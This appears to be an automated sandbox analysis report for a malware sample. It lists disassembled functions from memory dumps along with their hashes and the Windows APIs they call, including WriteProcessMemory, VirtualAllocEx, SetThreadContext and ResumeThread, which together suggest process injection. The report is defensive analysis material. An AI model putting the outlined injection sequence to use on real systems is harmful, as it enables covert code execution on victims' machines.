
Function 02F75483 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2411887844.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf297ed4be4f2b16fe6f1a231c9a6be6fb964440a24125ca0bc5e49e02708c21
Instruction ID: 83b538dc8011819b4a4fb2a749b523d512a6570d56c16d181605cfb3f5a4cc94
Opcode Fuzzy Hash: bf297ed4be4f2b16fe6f1a231c9a6be6fb964440a24125ca0bc5e49e02708c21
Instruction Fuzzy Hash: 6E210871E016588BDB58CFAAD8543DEFBF3AFC9310F14C16AD409A6258DB741959CF40

Uniqueness

Uniqueness Score: -1.00%

Function 08D17296 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2439825016.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8280e4d842b348197c0ce78f9b2f6d5d90d03d0d4b67b34b8b48020916210468
Instruction ID: aac3bf0b871c73fb8b81a9b9550cf81704e038ac32647c578e6a55b58c3c57b1
Opcode Fuzzy Hash: 8280e4d842b348197c0ce78f9b2f6d5d90d03d0d4b67b34b8b48020916210468
Instruction Fuzzy Hash: 7D31E8B1E016589BDB08CFA6D94539EFBF3AFC8300F24C12AD405AA268DB745A468F50

Uniqueness

Uniqueness Score: -1.00%

Function 0E7956A8 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2448926522.000000000E790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e790000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4323a06ccf2e56bd8aff46356718a5dc1c78e29bbdf69f6087a526b38e0afd13
Instruction ID: cbd159e7fcf7b4b96af4353cb70d1534b5ded0ebdbcdf71df9dfc074bfa57c82
Opcode Fuzzy Hash: 4323a06ccf2e56bd8aff46356718a5dc1c78e29bbdf69f6087a526b38e0afd13
Instruction Fuzzy Hash: 633199B1E046188BEB59CF6BD8453DEFAF3AFC8310F14C0AAC408A7265EB741A458F50

Uniqueness

Uniqueness Score: -1.00%

Function 0E7956B8 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2448926522.000000000E790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e790000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a00956ff649803f1f9acd703a00c0230214b4cf0e49a4bc575a3352f0c84ec50
Instruction ID: e7feee38c6357a39dd214e3525092db45ce026427ceb48801537bf72e5cc5ac1
Opcode Fuzzy Hash: a00956ff649803f1f9acd703a00c0230214b4cf0e49a4bc575a3352f0c84ec50
Instruction Fuzzy Hash: B23184B1E006188BEB58CF6BD9457DEFAF3AFC8300F14C0AAC518A7265EB741A458F50

Uniqueness

Uniqueness Score: -1.00%

Function 02F78AD9 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2411887844.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59601f964111abe0ab714f22768626a338af2d160235a65483d31268998ff089
Instruction ID: 22b7c337314fb30a34a9e289ef94f6692e82b98ae0601086ceec9626ac7f63d4
Opcode Fuzzy Hash: 59601f964111abe0ab714f22768626a338af2d160235a65483d31268998ff089
Instruction Fuzzy Hash: F321F971E056588FEB59CF6BDC4069EFBF3AFC9200F04C1BAC508A6265DB340A498F51

Uniqueness

Uniqueness Score: -1.00%

Function 08490040 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2438775780.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8490000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ba5890b172ec5741a31f7aa1b1699644e37f5af9118174663aec2221861d016
Instruction ID: d56ce5ef7ef059ef4816441509e95446522b4e3d860731e5ec423c91fd70cafb
Opcode Fuzzy Hash: 8ba5890b172ec5741a31f7aa1b1699644e37f5af9118174663aec2221861d016
Instruction Fuzzy Hash: 8921C3B1E006188BEB28CFAAD8447DEFBF2AFC8310F14C16AD908A6254DB751A55CF50

Uniqueness

Uniqueness Score: -1.00%

Function 08493698 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2438775780.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8490000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6267883bd1f4c58bc0505f72978f159d396f4801f5a9fae34915dd6df6baa0e
Instruction ID: 027d61dce1849d3c9fec4eaf3089e9dd626738737bf07f817ca83b0962ac0c27
Opcode Fuzzy Hash: d6267883bd1f4c58bc0505f72978f159d396f4801f5a9fae34915dd6df6baa0e
Instruction Fuzzy Hash: 5321B971E016188BEB58CF6BD84469EFBF7AFC8200F14C5BAC518A6224EB345A468F55

Uniqueness

Uniqueness Score: -1.00%

Function 0E740040 Relevance: 2.7, Strings: 2, Instructions: 205COMMON

Download Yara Rule

Strings

Hbq, xrefs: 0E7402B1
Hbq, xrefs: 0E7402E4

Memory Dump Source

Source File: 00000000.00000002.2448435152.000000000E740000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e740000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: e3eb66c7de52e9d1fce160c2321d1ab19f1c4147a56e41c31319dd1da2a28bb1
Instruction ID: 8e51215fac7834273d2b26d4f8d4e8c6373ed531efbd68bdb23c0932aebb978a
Opcode Fuzzy Hash: e3eb66c7de52e9d1fce160c2321d1ab19f1c4147a56e41c31319dd1da2a28bb1
Instruction Fuzzy Hash: 54714C34B002588FCB15EBA8D5949ADBBF2FF89350B2544A9D901EB3A5CB35EC41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0E74CF88 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

(bq, xrefs: 0E74EAA2
Hbq, xrefs: 0E74EBC0

Memory Dump Source

Source File: 00000000.00000002.2448435152.000000000E740000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e740000_2M1NS61GG8.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: d1f16d0e97249ea6030893864c2df823ae461c81b7a98bf56b53832e0741395c
Instruction ID: 13fee2815f6dd5bf8f5c8b0a1a31b07e65b561218e8cf896d35033a4af5628b6
Opcode Fuzzy Hash: d1f16d0e97249ea6030893864c2df823ae461c81b7a98bf56b53832e0741395c
Instruction Fuzzy Hash: 70512331604150AFC715AF68C058AADBBA6FF85320F1985BAD40A9F766CB35FC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02F8A6C8 Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02F8A91E

Memory Dump Source

Source File: 00000000.00000002.2411933547.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f80000_2M1NS61GG8.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2fb29cb0195001c83110ad942d078bc77734651246537774c7d8f05cd3e9a926
Instruction ID: 94169b61c77d9cd7e00132edf9f8d002c00c68c0e1dba6fd6226a152e75aefd3
Opcode Fuzzy Hash: 2fb29cb0195001c83110ad942d078bc77734651246537774c7d8f05cd3e9a926
Instruction Fuzzy Hash: 18712070A00B098FDB24EF69D45475AFBF2FB88344F008A2ED58A97B50DB75E845CB90

Uniqueness

Uniqueness Score: -1.00%

Function 083D1FF0 Relevance: 1.7, APIs: 1, Instructions: 166processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 083D2163

Memory Dump Source

Source File: 00000000.00000002.2438658006.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_83d0000_2M1NS61GG8.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: ff136d25175b5794967a0143e3df928feb2fa75a8775b84e4c1df0c4ceab997a
Instruction ID: 9e0b17bae4d3d870476b07a988216112b9babd4b2d3a05b24d1a05281f125db7
Opcode Fuzzy Hash: ff136d25175b5794967a0143e3df928feb2fa75a8775b84e4c1df0c4ceab997a
Instruction Fuzzy Hash: 04511971D00229DFDB24CF99D840BDEBBB5BF88314F0484AAE918B7210DB75AA85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 08D15351 Relevance: 1.7, APIs: 1, Instructions: 164memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 08D154A3

Memory Dump Source

Source File: 00000000.00000002.2439825016.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_2M1NS61GG8.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a1f44b25f8b3d55b1ad1ea92ce3eb3d22a8aa74064e6fe771c1acb00487e7a7a
Instruction ID: 8b9d84268b9dfd76540b9e415c36309e6d45556fc9cf8bbc0978398e897d3dd1
Opcode Fuzzy Hash: a1f44b25f8b3d55b1ad1ea92ce3eb3d22a8aa74064e6fe771c1acb00487e7a7a
Instruction Fuzzy Hash: B0518772404B44DFCB2A8F59E4426DABFB4FF46320B8A4199E486DB1B1C3764885CFB4

Uniqueness

Uniqueness Score: -1.00%

Function 0849DFB8 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 0849E123

Memory Dump Source

Source File: 00000000.00000002.2438775780.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8490000_2M1NS61GG8.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: f2384331698aee76fd195732d3f1f684669e5d58243c9f7182d7687447bf7c27
Instruction ID: 75f48042cde92a8d4154477c6ee9343c0c71dd6e270885b4f14278cd5dff76c6
Opcode Fuzzy Hash: f2384331698aee76fd195732d3f1f684669e5d58243c9f7182d7687447bf7c27
Instruction Fuzzy Hash: 4B51E571900229DFDB24CF99C840BDEBBB5BF48310F1484AAE948B7250EB759A85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 08D1539C Relevance: 1.6, APIs: 1, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 08D154A3

Memory Dump Source

Source File: 00000000.00000002.2439825016.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_2M1NS61GG8.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 4d4957bb05f59dff686ecde042709f9129337f03c223ea7bb4e42983407b0a92
Instruction ID: 308f892dbc09466620f2275839c64a0d3224a03c5614903961aa1fdd630344ea
Opcode Fuzzy Hash: 4d4957bb05f59dff686ecde042709f9129337f03c223ea7bb4e42983407b0a92
Instruction Fuzzy Hash: 65419CB1404B44DFCB1A8F59D4426DABFB4FF46320F8A8199E485DB2A1C3364885CFB5

Uniqueness

Uniqueness Score: -1.00%

Function 02F705C8 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02F70660

Memory Dump Source

Source File: 00000000.00000002.2411887844.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_2M1NS61GG8.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a5caddcaf0a0e62b07cc8ba5ea0171d7deb6fd622ee5672889ff7cc520b3cc71
Instruction ID: 534925610b5e7fc39d19281c99ffad5e1d3882d8487674c5983d039c092a6201
Opcode Fuzzy Hash: a5caddcaf0a0e62b07cc8ba5ea0171d7deb6fd622ee5672889ff7cc520b3cc71
Instruction Fuzzy Hash: 462128759003599FCB10CFA9C881BEEBBF1FF48314F10842AE958A7251C7789945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 02F714E0 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02F71566

Memory Dump Source

Source File: 00000000.00000002.2411887844.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_2M1NS61GG8.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: cc75730fd9726ee5d03fc4510f1a97477f527371fdda00cd68977e0673207a41
Instruction ID: 10278e561ed95ac0e7bda59b14bfecbe569cb0ded3f1560b60f35217c06b64b1
Opcode Fuzzy Hash: cc75730fd9726ee5d03fc4510f1a97477f527371fdda00cd68977e0673207a41
Instruction Fuzzy Hash: B3219AB1D043498FCB10CFA9C4817EEBFF0AF4A364F14846AD599A7291C7789949CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F705D0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02F70660

Memory Dump Source

Source File: 00000000.00000002.2411887844.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_2M1NS61GG8.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e5f600887b85df8e34944dae1dec8f0cb14a4f707ce124300896d95e29c3a595
Instruction ID: 4d5cf00a2afd4a847352d22a9bcd7089c129111bd409ce13f3690f37f38c69d4
Opcode Fuzzy Hash: e5f600887b85df8e34944dae1dec8f0cb14a4f707ce124300896d95e29c3a595
Instruction Fuzzy Hash: 732128B59003599FCB10CFA9C845BDEBBF5FF48314F10842AE558A7250CB789544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02F8B440 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F8CF76,?,?,?,?,?), ref: 02F8D037

Memory Dump Source

Source File: 00000000.00000002.2411933547.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f80000_2M1NS61GG8.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e1f46832e7a1813f786cefd5f23840270d86622dbd154f5ec40ebc0c9c4160cb
Instruction ID: 4e0671e58c385356667db78e6f7965302d15e6b2dd9902313bdcbbb8023463ab
Opcode Fuzzy Hash: e1f46832e7a1813f786cefd5f23840270d86622dbd154f5ec40ebc0c9c4160cb
Instruction Fuzzy Hash: 7821E3B5900258DFDB10DFAAD984AEEFBF4EB48310F14845AE918A7350D378A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02F714E8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02F71566

Memory Dump Source

Source File: 00000000.00000002.2411887844.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_2M1NS61GG8.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8cb88e4a352239ee018ea86037d3ec45b519dc5b8661ca9a710c4dd92d31217a
Instruction ID: 5bd9af6cba0baf45ef0694dda1fa443fbfeec38f532daf4b25f273c6e326559d
Opcode Fuzzy Hash: 8cb88e4a352239ee018ea86037d3ec45b519dc5b8661ca9a710c4dd92d31217a
Instruction Fuzzy Hash: 522138B1D003098FDB14DFAAC4857EEBBF4EF48364F10842AD559A7240CB78A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0849FA70 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0849FAEE

Memory Dump Source

Source File: 00000000.00000002.2438775780.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8490000_2M1NS61GG8.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 5c186f8a17da9024bb6bbd64c7a35e0a729205639fd876b3ca45199b85a6ef0b
Instruction ID: 8af653c24efd7f4d4682eac6158dcb792d148d3287bd69c3603264695cd0180c
Opcode Fuzzy Hash: 5c186f8a17da9024bb6bbd64c7a35e0a729205639fd876b3ca45199b85a6ef0b
Instruction Fuzzy Hash: 4D2109719003098FDB10DFAAC4857EEBBF4AB48324F14C42AD459A7241DB78A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02F70D18 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 02F70D97

Memory Dump Source

Source File: 00000000.00000002.2411887844.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_2M1NS61GG8.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e3fa9009a01e6ab5f6cc269f54fd28baf9e26a21a1637a1f90acee4d105b9a93
Instruction ID: 4717386dee532cbfbec83a57b796518b372337f73af8047f4110cfd052e1b1bd
Opcode Fuzzy Hash: e3fa9009a01e6ab5f6cc269f54fd28baf9e26a21a1637a1f90acee4d105b9a93
Instruction Fuzzy Hash: 832137B18002499FCB10CFAAC445BEEBBF5EF48320F10842AD559A7250CB39A945CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02F8CFA8 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F8CF76,?,?,?,?,?), ref: 02F8D037

Memory Dump Source

Source File: 00000000.00000002.2411933547.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f80000_2M1NS61GG8.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7b8436a571e478091038d51a69f8c144d7c741ad47a5dde78c83f08af3e8a371
Instruction ID: ea4daf76b3c88474608b66221abca4a91ea683008ff871d7756aa80d6c37174d
Opcode Fuzzy Hash: 7b8436a571e478091038d51a69f8c144d7c741ad47a5dde78c83f08af3e8a371
Instruction Fuzzy Hash: F421E0B5900259EFDB10CFA9D584AEEFBF5EB48310F14841AE918A7250D378A941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02F70D20 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 02F70D97

Memory Dump Source

Source File: 00000000.00000002.2411887844.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_2M1NS61GG8.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3324b0ae9c45502cba9c7f642801fc1fd120cf9c7c95c3237de9c21b1c49ec29
Instruction ID: 61b58078153a4782795468abd4c463f19d611064a408d38dc0e2c6bc86346828
Opcode Fuzzy Hash: 3324b0ae9c45502cba9c7f642801fc1fd120cf9c7c95c3237de9c21b1c49ec29
Instruction Fuzzy Hash: 8A2118B19003499FDB10DFAAC444BEEFBF5EF48320F10842AD559A7250CB79A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0849FF10 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 0849FF81

Memory Dump Source

Source File: 00000000.00000002.2438775780.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8490000_2M1NS61GG8.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 2e31eec102b389bafe88cf937a547b8742589d0a717676d6e99c1002e2362d04
Instruction ID: 8164752d236d7646f5e2fa8cbc431791da1410de5f575cc04a8586773e0af02e
Opcode Fuzzy Hash: 2e31eec102b389bafe88cf937a547b8742589d0a717676d6e99c1002e2362d04
Instruction Fuzzy Hash: BA2113B1D002098FDB14CF9AC844BEEFBF5AB88324F14842AD458A7250DB78A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0E795561 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 0E7955D8

Memory Dump Source

Source File: 00000000.00000002.2448926522.000000000E790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e790000_2M1NS61GG8.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: eeb683f8fee2e0c9187ee3f18a105dc771439b75906fca26adb8320567bb17ce
Instruction ID: f2d4b91cac448268f3976bae74a7f7266d7a309a4ea43f287a6efcfe313087aa
Opcode Fuzzy Hash: eeb683f8fee2e0c9187ee3f18a105dc771439b75906fca26adb8320567bb17ce
Instruction Fuzzy Hash: 862136B2C006699FCB14CFAAD5447EEFBB1EF48320F14812AD858B7251D738A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02F70268 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 02F702DE

Memory Dump Source

Source File: 00000000.00000002.2411887844.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_2M1NS61GG8.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 89b2706b1a3ecc5eb930aef5a0cad340595107e6c077b7782b58c07613fce4a3
Instruction ID: 94ec5c838b5e52390772f7c66e460f58745f79be94baaa74d818bf03dbd9279e
Opcode Fuzzy Hash: 89b2706b1a3ecc5eb930aef5a0cad340595107e6c077b7782b58c07613fce4a3
Instruction Fuzzy Hash: 782189728002498FCB20DFA9C845BEEFFF1EF88324F24841AD559A7250CB75A940CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 083D7699 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 083D770A

Memory Dump Source

Source File: 00000000.00000002.2438658006.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_83d0000_2M1NS61GG8.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 56fc9768d60ea8ca859e7356cab2d024451c60defea465c88bcd3be9cf0c9ec5
Instruction ID: ff78908ca7cde8864fcf45761ace5d43df49bfafe0b266d37da4e96608aa31ff
Opcode Fuzzy Hash: 56fc9768d60ea8ca859e7356cab2d024451c60defea465c88bcd3be9cf0c9ec5
Instruction Fuzzy Hash: FB2124B68002598FDB14CF9AD844AEEBBF4AB88310F14842ED858A7650D338A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 084968D9 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 08496953

Memory Dump Source

Source File: 00000000.00000002.2438775780.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8490000_2M1NS61GG8.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: fb6120093e00c936800d14492dbe4d3f52614c63008eacbcb68d00e54d54524f
Instruction ID: afacd5ca4b63525efd23b2e48d9d090576ba7de266875c63d6374a6804bc631a
Opcode Fuzzy Hash: fb6120093e00c936800d14492dbe4d3f52614c63008eacbcb68d00e54d54524f
Instruction Fuzzy Hash: 812117B59002499FCB10CF9AC445BDEFFF4FB48320F10842AE898A7251D378A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0E795568 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 0E7955D8

Memory Dump Source

Source File: 00000000.00000002.2448926522.000000000E790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e790000_2M1NS61GG8.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: a2d5e2b054a34406dbbfebfeeead98b34ef992ef4641fb3073b14065e0d6aa9f
Instruction ID: fb83690a9a5ada75df419506b3098d4026f15c3d0fe435fd72d9220dfbb49fd8
Opcode Fuzzy Hash: a2d5e2b054a34406dbbfebfeeead98b34ef992ef4641fb3073b14065e0d6aa9f
Instruction Fuzzy Hash: 8C1133B2C0062A9BCB10DF9AD544B9EFBB5EF48320F10812AD818A7251D738A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0E79EEA8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 0E79EF1B

Memory Dump Source

Source File: 00000000.00000002.2448926522.000000000E790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e790000_2M1NS61GG8.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 869113f5a58b242007aad0b207b80c6fb86990e50520b51da57a0e0cfe8719f9
Instruction ID: 737bbf07f3e9a068e2f67148449b07e7670db2d2c58272dbdc15c8b1a772678c
Opcode Fuzzy Hash: 869113f5a58b242007aad0b207b80c6fb86990e50520b51da57a0e0cfe8719f9
Instruction Fuzzy Hash: 5B21E4B59002499FCB10DF9AD884BDEFBF5FF48320F10842AE958A7250D379A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02F71768 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?), ref: 02F717D2

Memory Dump Source

Source File: 00000000.00000002.2411887844.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_2M1NS61GG8.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8c124c8b9561966b33940674544c927fb7c2d4613606609c8f71e522c04e09fb
Instruction ID: d61a0886ee18388851be849020f17523376895a4d06f1e3911a74c903d03c8b8
Opcode Fuzzy Hash: 8c124c8b9561966b33940674544c927fb7c2d4613606609c8f71e522c04e09fb
Instruction Fuzzy Hash: 43116AB1D043888FCB21DFA9C4457EEFFF0AF89324F14885AC459A7251C7396845CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02F89A68 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02F8A999,00000800,00000000,00000000), ref: 02F8ABAA

Memory Dump Source

Source File: 00000000.00000002.2411933547.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false

